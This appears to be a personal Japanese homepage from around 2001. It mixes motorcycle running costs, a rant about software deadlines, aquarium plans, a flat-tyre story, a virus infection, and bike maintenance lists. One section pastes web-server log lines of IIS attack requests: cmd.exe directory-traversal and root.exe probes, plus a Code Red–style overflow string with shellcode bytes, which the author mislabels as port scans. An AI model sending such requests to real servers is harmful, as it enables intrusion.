車種 | 車両本体価格
(円) |
乗車期間 | 走行距離(Km) | 円/Km |
RZ350S | 570,000 | '93.6-'97.2 | 106,000 | 5.38 |
TZR250 | 220,000 | '97.2-'99.1 | 47,000 | 4.68 |
YZF600R | 850,000 | '99.2-'00.12 | 66,800 | 12.72 |
少し前まで仕事場でよく聞かれた監督者さんの言葉:
「明日
持ってかなきゃならないんですよ〜。
絶対に間に合わせてください」
「困るんですよ〜。
今すぐ対応お願いします」
「大変なのはわかるんだけど、
なんとかがんばってよ」
あのねぇ、ソフト開発ってのはガソリン入れるとかオイル交換するとか店で買い物するとか宅急便で何か頼むとかってのとは違うのよ。
あんたらがバリバリものを作ってた時代のような単純なもんじゃないのよ。
生産量=人数×労働時間
...って、いつの時代の尺度でモノをいってんのよ?
言われているほうはたまったもんじゃない。端で聞いている連中だってうんざりだ。
重要:
できないものは何をやってもできない。
それはもう止めるか、最初からやり直すしかない。
最近は監督者さんたちもようやく現実が飲み込めてきたようで、半分アキラメの境地にあるように見える。
多分、どこかでこのプロジェクトはストップをかけなければならない。さもなければ春先に有能な人材が大量転職することになるだろう(僕じゃないよ。残念ながら)。その有能な人材さんのすべてが人間的に優れているわけではないから、新しい場所で古い場所のことを散々にしゃべり散らかすことだってあるだろう。そうなると企業の信用は見えないところから徐々に崩壊し、一度失墜すると二度と回復することはない。
少なくとも僕は雪印製品を買わなくなったね。
もうひとつ重要:
これがソフトウェア開発の現実である!
ここだけに固有の問題ではない!
従って現在のすべての商用ソフトウェアは信頼できない!
これはユーザサイドにも責任がある。「早く出せ!すぐに出せ!今すぐに!」って言われたってねぇ。
今日中に100mを7秒5で走れるようになれ!って言ってるようなもんなのよ。
もし陸上競技に関する知識が皆無だとしたら、「日本記録が10秒ちょうどくらいだっけ?なんだ、たった2秒ちょっとじゃん」と思うはずだ。
誰もそんなことを言わないのは、少なくとも日本では体育の授業で嫌でも走らされたことがあってみんなが知ってるからだ。多分ね。
なんだか思考が発散してきたなぁ。疲れてるのかな?(疲れてなくたってそうだけど)
今日は久しぶりの日曜日。もしかしたら会社から呼び出しがあるかもしれないけど、それまではゆったりとすごそう。
佐野元春のお気に入りの曲でも聞きながら。今日のBGMは
「こんな素敵な日には」&
「情けない週末」で決まり。
昼までに呼び出しがなければ葛西臨海公園の水族園に行って
ナポレオンフィッシュでも見て帰ろうか。
ナポレオンフィッシュといえば、三重県の鳥羽水族館に見事なのが2匹もいる。鳥羽といえばジュゴンとマナティ。去年はなんだかんだいいながら実は3回も足を運んだ。こりゃ年間フリーパスを買ったほうが得だったかな。
そういえば去年中に一度は見たかった大阪のジンベイザメ。今年こそ。
ナポレオンフィッシュで思い出した。水族館に行くと、奴のことを
「シーマン」と呼ぶ声をよく耳にした。
ドリキャス生産中止
。果たしてプレステに移植されるんだろうか。ビバリウムさん、どうすんのかな?
2001/2/4 久々なんでちょっと長かったな。
と思ったら甘かったのね。
阪神高速の入り口から本線に向かうランプでなんだかバイクが挙動不審
なわけ。カーブを曲がると後ろタイヤがぐらぐらする
のね。こりゃなんかおかしいわ、と待避所に止めて点検したらあんた、クギを踏んで空気が抜けてるじゃあーりませんか!
パンクですよパンク!
ふふん、そんなことでビビるワシでもないわい、と取り出したるはパンク修理セット...
ノリが固まっとって使えんがな〜〜〜!
あわてて高速から出て、オートバックスを見つけて修理キットのスペアを入手、修理完了までに要した時間およそ1時間。何とか無事に帰って来れました。
みなさんも、お手持ちの車載工具の点検をお忘れなく。
2001/4/2
...更新なし...8月
明日は名古屋まで出張ってルータを漁ろう...と思っていたのですが、今日の仕事が終わらなかったんで明日は一日中自宅でパソコンと格闘です。モデムが届く時間もわからんし、どの道、外出できんがね。
そういえば今日は
敬老記念日 [ ● ]
だったんですねぇ。旗日だったんですねぇ。ネットニュースで「65歳以上の人口に占める女性の割合が...」ってぇ記事を見て初めて気が付いたのは、もう夕方になった頃でした。なんか悲しい。
2001/9/15
readme.emlっていう名前のいかにも怪しげなファイルをダウンロードしてきたわけね。あんまりにも素敵な名前なんでテキストエディタで開いてみると、
readme.exeっていうこれまたいかにもって感じの添付ファイル。こりゃウイルスだな、と直感したアタシは早速削除したのね。でも何かしらネットワークがえらく遅くなったのに気付いたのね。おかしいな、ファイルは開いとらんがね。それでも遅いことは事実。いや、全然つながらなくなった。
TCPポートというポートがぜーんぶ開いとるがね!!!
やられた 〜〜〜〜〜〜っっ!!!!!!!!!!!!!!!! |
感染数: |
210 |
駆除数: |
210 |
202.99.11.204 - - [02/Oct/2001:11:31:50 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303ご存知の向きもおられる事と思いますが、これらはいわゆる ポートスキャンです。
202.99.11.204- - [02/Oct/2001:11:31:51 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
202.156.0.11-- [02/Oct/2001:12:55:22 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276
202.51.148.193- - [02/Oct/2001:15:13:22 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0"404 281
202.51.148.193- - [02/Oct/2001:15:13:24 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0"404279
202.51.148.193- - [02/Oct/2001:15:13:26 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"404 289
202.51.148.193- - [02/Oct/2001:15:13:28 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"404 289
202.51.148.193- - [02/Oct/2001:15:13:30 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
202.51.148.193- - [02/Oct/2001:15:13:32 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
202.51.148.193- - [02/Oct/2001:15:13:35 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
輸入自動車等(小型二輪車)の排出ガス規制に関するご案内 平成13年4月1日より輸入自動車等の排出ガス規制が施行されております。 それに伴い、4月1日以降の製作車の登録の際には「自動車排出ガス試験結果成績表」の添付が必要になっております。 つまり、該当車輌につきましては、公的機関に於いて「自動車排出ガス試験」の受検を行い、「自動車排出ガス試験結果成績表」の取得を行っております。 しかしながら、弊社取扱モデルの中でも、この排出ガス規制の基準値を現状のままでは満たさないモデルがあり、02年モデルの取扱を見合わせているモデルがざいますので、以下ご案内申し上げます。 尚、弊社としましては、今回の排出ガス規制に対し、お客様の選択肢の幅が狭まらないよう、引き続き努力を重ねておりますので、宜しくご理解の程お願い申し上げます。 |
こいつ、シャフターだぞ。出先でチェーンを気にする必要がないぞ。 こいつ、クラウザー 対応車種だぞ。ハードケース付けられるぞ。 こいつ、シート高が猫よりちょっと低いぞ。たちゴケ減るぞ。 こいつ、センスタ付きだぞ。メンテ楽そうだぞ。 こいつ、燃料タンク容量が24リットルだぞ。どこまでも行けるぞ。 そして何より、確か猫と大して変わらん値段だったぞ! |
修理個所 |
内容 |
指定銘柄等 |
タイヤ |
交換 |
BRIDGESTONE BT−57 前後とも |
ドライブチェーン |
交換 |
DID G−BRIGHT 50VM |
ドライブスプロケット |
交換 |
純正品 |
ドリブンスプロケット |
交換 |
純正品 |
フロントフォーク |
オーバーホール |
オイルシール、スライドメタル交換 |
リアサスペンション |
オーバーホール |
OHLINS |
リアスイングアーム |
オーバーホール |
ベアリング、オイルシール交換 |
スパークプラグ |
交換 |
DENSO IRIDIUM POWER IU27 |
エアクリーナエレメント |
交換 |
純正品 |
マフラー(サイレンサーのみ) |
交換 |
純正品 |